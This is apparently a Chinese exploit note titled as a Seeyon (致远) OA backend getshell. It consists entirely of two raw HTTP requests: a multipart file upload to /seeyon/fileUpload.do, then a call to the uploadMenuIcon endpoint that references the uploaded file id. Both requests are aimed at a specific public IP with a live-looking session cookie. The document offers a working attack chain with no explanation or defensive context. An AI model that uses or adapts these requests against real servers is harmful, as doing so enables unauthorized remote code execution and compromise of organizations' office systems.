登录 白背景
致远OA 后台getshell

POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1
Content-Length: 911
Content-Type: multipart/form-data; boundary=PYK_4-biTo45TrFO2zWOSmAcPHNrjd
Host: 39.170.4.162:81
Cookie: JSESSIONID=3F0DCBBA5D714A404457EF14F6F57C1E; avatarImageUrl=-4401606663639775639; loginPageURL=""
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_251)
Connection: close

--PYK_4-biTo45TrFO2zWOSmAcPHNrjd
Content-Disposition: form-data; name="Filedata"; filename="LbBYb1C1Y.zip"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

111sdsdasd
--PYK_4-biTo45TrFO2zWOSmAcPHNrjd
Content-Disposition: form-data; name="callMethod"
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit

resizeLayout
--PYK_4-biTo45TrFO2zWOSmAcPHNrjd
Content-Disposition: form-data; name="firstSave"
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit

true
--PYK_4-biTo45TrFO2zWOSmAcPHNrjd
Content-Disposition: form-data; name="takeOver"
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit

false
--PYK_4-biTo45TrFO2zWOSmAcPHNrjd
Content-Disposition: form-data; name="type"
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit

0
--PYK_4-biTo45TrFO2zWOSmAcPHNrjd--







GET /seeyon/privilege/menu.do?method=uploadMenuIcon&fileid=-1175625756037856420&filename=66.txt HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://39.170.4.162:81/seeyon/portal/portalController.do?method=showSystemNavigation
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 39.170.4.162:81
Cookie: JSESSIONID=3F0DCBBA5D714A404457EF14F6F57C1E; avatarImageUrl=-4401606663639775639; loginPageURL=""
Connection: close